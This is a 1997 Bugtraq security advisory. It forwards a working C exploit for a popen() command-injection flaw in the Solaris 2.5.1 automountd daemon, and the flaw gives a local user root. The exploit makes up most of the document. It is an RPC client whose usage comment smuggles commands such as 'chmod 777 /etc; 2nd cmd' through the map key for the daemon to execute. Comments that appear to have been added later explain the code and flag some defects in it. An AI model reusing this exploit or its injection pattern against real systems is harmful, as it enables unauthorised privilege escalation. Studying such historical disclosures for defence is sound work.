Solaris 2.5.1 automountd hole

Summary
Description: standard popen() hole
Author: Anonymous
Compromise: root (local)
Vulnerable Systems: Solaris 2.5.1 without patch 10465[45] applied
Date: 26 November 1997
Details


Date: Wed, 26 Nov 1997 02:02:13 -0600
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Solaris 2.5.1 automountd exploit (fwd)

From anonymous:
--

/*
 this is a really dumb automountd exploit, tested on solaris 2.5.1
 ./r blahblah /bin/chmod "777 /etc; 2nd cmd;3rd cmd" and so on,
 map is executed via popen with key given as argument, read automount(1M)

 patch 10465[45] fixes this

 */

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/autofs_prot.h>

/* Transport class handed to clnt_create() below.  Presumably the RPC
   "visible datagram" nettype from netconfig(4); the original author left
   this marked XXX, so confirm it against the target's /etc/netconfig. */
#define AUTOTS "datagram_v" /* XXX */

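/*
 * Print the command-line synopsis and terminate.  Never returns.
 *   s: the program name (argv[0]) echoed in the message.
 * Diagnostics go to stderr and the process exits non-zero, so a caller
 * or script can tell a usage error from a completed run.
 */
void usage(char *s) {
  fprintf(stderr, "Usage: %s mountpoint map key [opts]\n", s);
  exit(1);
}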

/*
 * XDR filter for a mntrequest.  The four string members are passed to
 * xdr_string() in the fixed wire order name, map, opts, path, each bounded
 * by the protocol's A_MAX* limit.  Stops at the first member xdr_string()
 * rejects and returns FALSE; returns TRUE once all four have been handled.
 */
bool_t
xdr_mntrequest(XDR *xdrs, mntrequest *objp)
{
        struct {
                char **where;
                unsigned int limit;
        } field[] = {
                { &objp->name, A_MAXNAME },
                { &objp->map,  A_MAXNAME },
                { &objp->opts, A_MAXOPTS },
                { &objp->path, A_MAXPATH },
        };
        size_t i;

        for (i = 0; i < sizeof field / sizeof field[0]; i++) {
                if (!xdr_string(xdrs, field[i].where, field[i].limit))
                        return (FALSE);
        }
        return (TRUE);
}

/*
 * XDR filter for a mntres, which carries a single int status.
 * Returns TRUE when xdr_int() accepts the member, FALSE otherwise.
 */
bool_t
xdr_mntres(XDR *xdrs, mntres *objp)
{
        return xdr_int(xdrs, &objp->status) ? TRUE : FALSE;
}

/*
 * Entry point.  Builds one AUTOFS_MOUNT request from the command line,
 * sends it over RPC to the automountd on this host (the name returned by
 * gethostname()), and prints the status the daemon answers with.
 *
 * argv[1] -> req.path, argv[2] -> req.map, argv[3] -> req.name (the map
 * key), argv[4] -> req.opts.  Per the file's header comment, the daemon
 * hands the map and key to popen(), so on an unpatched 2.5.1 host the
 * contents of the key, not this client, decide what the daemon executes.
 * The mitigation is the vendor patch named in that header comment; the
 * daemon-side reliance on popen() is the defect, this client only shows
 * that any local user can reach it.
 *
 * NOTE(review): no return type (implicit int, not valid C99+), no return
 * statement, and every error path exit()s with status 0.
 */
main(int argc, char *argv[]) {
  char hostname[MAXHOSTNAMELEN];
  CLIENT *cl;
  enum clnt_stat stat;
  struct timeval tm;
  struct mntrequest req;
  struct mntres result;

  /* usage() does not return, so argv[1..3] exist from here on. */
  if (argc < 4)
    usage(argv[0]);

  /* Request members alias argv directly; nothing is copied or checked. */
  req.path=argv[1];
  req.map=argv[2];
  req.name=argv[3];
  /* NOTE(review): with argc == 4 this reads argv[argc], which is NULL, so
     opts is a null pointer by the time xdr_string() is asked to encode it. */
  req.opts=argv[4];
  /* The request is addressed to this machine's own name, i.e. the local
     daemon. */
  if (gethostname(hostname, sizeof(hostname)) == -1) {
    perror("gethostname");
    exit(0);
  }
  /* AUTOTS picks the transport class; see its #define above. */
  if ((cl=clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) {
    clnt_pcreateerror("clnt_create");
    exit(0);
  }
  /* Timeout passed to clnt_call(): five seconds. */
  tm.tv_sec=5;
  tm.tv_usec=0;
  stat=clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req, xdr_mntres,
                (char *)&result, tm);
  if (stat != RPC_SUCCESS)
    clnt_perror(cl, "mount call");
  else
    printf("mntres = %d.\n", result.status);
  /* Release the client handle on both the success and the RPC-error path. */
  clnt_destroy(cl);
}
